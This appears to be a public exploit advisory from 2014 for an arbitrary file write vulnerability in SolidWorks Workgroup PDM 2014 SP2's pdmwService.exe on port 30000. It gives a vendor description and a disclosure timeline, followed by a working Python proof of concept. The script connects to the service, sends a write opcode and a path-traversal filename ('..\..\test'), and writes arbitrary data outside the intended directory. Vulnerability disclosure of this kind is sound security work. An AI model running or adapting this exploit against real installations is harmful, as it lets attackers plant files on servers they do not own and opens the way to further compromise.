SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write

`# Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability  
# Date: 2-21-2014  
# Author: Mohamed Shetta  
Email: mshetta |at| live |dot| com  
# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm  
# Tested on: Windows 7  
#Vulnerability type: Arbitrary File Write  
#Vulnerable file: pdmwService.exe  
#PORT: 30000  
  
  
---------------------------------------------------------------------------------------------------------  
Software Description:  
  
SolidWorks  
Workgroup PDM is a PDM tool that allows SolidWorks users operating in  
teams of 10 members or less to work on designs concurrently. With  
SolidWorks PDM Workgroup, designers can search, revise, and vault CAD  
data while maintaining an accurate design history.  
  
  
---------------------------------------------------------------------------------------------------------  
Vulnerability Details:  
  
This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of SolidWorks Workgroup PDM.  
  
------------------------------------------------------------------------------------------------------------  
Disclosure timeline:  
  
12/15/2013 - Vendor notified and no response.  
2/21/2014 - Public disclosure  
'''  
  
#!/usr/bin/env python  
  
import socket  
import struct  
import ctypes  
  
FileName="\x2E\x00\x2E\x00\x5C\x00\x2E\x00\x2E\x00\x5C\x00\x74\x00\x65\x00\x73\x00\x74\x00" #..\..\test  
Data="A"*1028  
FileSize=len(Data)  
FNsz=len(FileName)  
OpCode="\xD0\x07\x00\x00"  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect(("192.168.0.4", 30000))  
s.send(OpCode)  
s.send(struct.pack("I", FNsz))  
s.send(FileName)  
s.send(struct.pack('<Q', FileSize))  
s.send(Data)  
  
`